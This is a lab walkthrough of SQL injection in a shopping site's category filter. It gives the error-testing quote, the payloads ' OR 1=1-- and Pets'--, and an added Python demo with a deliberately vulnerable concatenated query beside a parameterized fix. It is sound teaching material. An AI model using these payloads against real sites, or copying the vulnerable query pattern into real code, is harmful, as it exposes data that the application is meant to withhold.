SQL Injection in WHERE Clause

2023/07/22 1:09PM

Description

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

Getting Started

Once the lab is loaded we are greeted with a shopping website. On the website we can view products and "Refine your search" to filter products.

When filtering by "Pets" the URL will look like so:

https://0a90009e04d619d180f0851300c30014.web-security-academy.net/filter?category=Pets

From the lab description we can tell that the Pets value is being put into the SQL query like so:

SELECT * FROM products WHERE category = 'Pets' AND released = 1

Error-Based SQL Injection

We can test for Error-Based SQL injection by simply putting a single quote and checking for a Server Error.

https://0a90009e04d619d180f0851300c30014.web-security-academy.net/filter?category=Pets'

We indeed get a Server Error when injecting a single quote.

We get a Server Error because the SQL syntax will be invalid:

SELECT * FROM products WHERE category = 'Pets'' AND released = 1

Unreleased Data

To return values in the database that are unreleased, we can comment out the "AND released = 1".

SELECT * FROM products WHERE category = 'Pets'-- ' AND released = 1

The resulting SQL query returns an unreleased product, but for some reason it didn't solve the lab. To return all products instead, we can inject the payload ' OR 1=1--

SELECT * FROM products WHERE category = 'Pets' OR 1=1-- ' AND released = 1
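As an added example (not part of the original write-up or the lab), the following Python reproduces the three queries above against a constructed in-memory SQLite table, and shows the same inputs against a parameterized version of the filter. The table contents, the function names and the use of sqlite3 are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed sample data: two categories, each with one unreleased product.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("Cat Bed", "Pets", 1), ("Dog Toy", "Pets", 0),
         ("Mug", "Gifts", 1), ("Secret Gift", "Gifts", 0)],
    )
    return conn


def filter_vulnerable(conn, category):
    # The pattern the lab describes: the category is concatenated into the SQL text,
    # so a quote in the input becomes SQL syntax rather than data.
    sql = "SELECT name FROM products WHERE category = '" + category + "' AND released = 1"
    return sorted(row[0] for row in conn.execute(sql))


def filter_parameterized(conn, category):
    # The fix: a bound parameter is always treated as a string value, never as SQL.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in conn.execute(sql, (category,)))


def demo():
    conn = make_db()
    results = {"vuln_normal": filter_vulnerable(conn, "Pets")}
    try:
        filter_vulnerable(conn, "Pets'")        # unbalanced quote -> invalid SQL
        results["vuln_quote"] = "no error"
    except sqlite3.OperationalError:
        results["vuln_quote"] = "syntax error"  # what the lab surfaces as a Server Error
    results["vuln_comment"] = filter_vulnerable(conn, "Pets'--")        # drops released = 1
    results["vuln_or"] = filter_vulnerable(conn, "Pets' OR 1=1--")      # every row
    # Same inputs through the parameterized filter: no match, no error, no leak.
    results["param_quote"] = filter_parameterized(conn, "Pets'")
    results["param_or"] = filter_parameterized(conn, "Pets' OR 1=1--")
    return results


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label}: {value}")
```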